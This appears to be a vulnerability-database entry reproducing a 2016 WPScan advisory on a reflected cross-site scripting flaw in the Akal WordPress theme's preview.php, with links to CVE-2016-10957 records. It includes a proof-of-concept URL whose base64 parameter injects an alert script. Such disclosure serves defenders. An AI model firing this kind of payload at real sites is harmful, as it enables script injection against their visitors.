Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbJan ReilinkWPVDB-ID:D0F9D91F-FD79-4F96-9001-94CE94529035
HistoryAug 22, 2016 - 12:00 a.m.

Akal Theme - Reflected Cross-Site Scripting (XSS)

2016-08-2200:00:00
Jan Reilink
wpscan.com
7

EPSS

0.001

Percentile

50.4%

JSON

The premium theme, Akal, suffers from a Reflected Cross-Site Scripting (XSS) vulnerability in the preview.php file located in framework/brad-shortcodes/tinymce.

PoC

http://example.com/wp-content/themes/akal/framework/brad-shortcodes/tinymce/preview.php?sc=PHNjcmlwdD5hbGVydCgieHNzIDwvc2NyaXB0JTNFIik8L3NjcmlwdD4=

Related

wpexploit 1
nvd 1
cve 1
prion 1
cvelist 1
wpexploit
wpexploit
Akal Theme - Reflected Cross-Site Scripting (XSS)
2016-08-22 00:00:00
nvd
nvd
CVE-2016-10957
2019-09-16 13:15:10
cve
cve
CVE-2016-10957
2019-09-16 13:15:10
prion
prion
Design/Logic Flaw
2019-09-16 13:15:00
cvelist
cvelist
CVE-2016-10957
2019-09-16 12:06:10

EPSS

0.001

Percentile

50.4%

JSON
Related for WPVDB-ID:D0F9D91F-FD79-4F96-9001-94CE94529035
wpexploit1nvd1cve1prion1cvelist1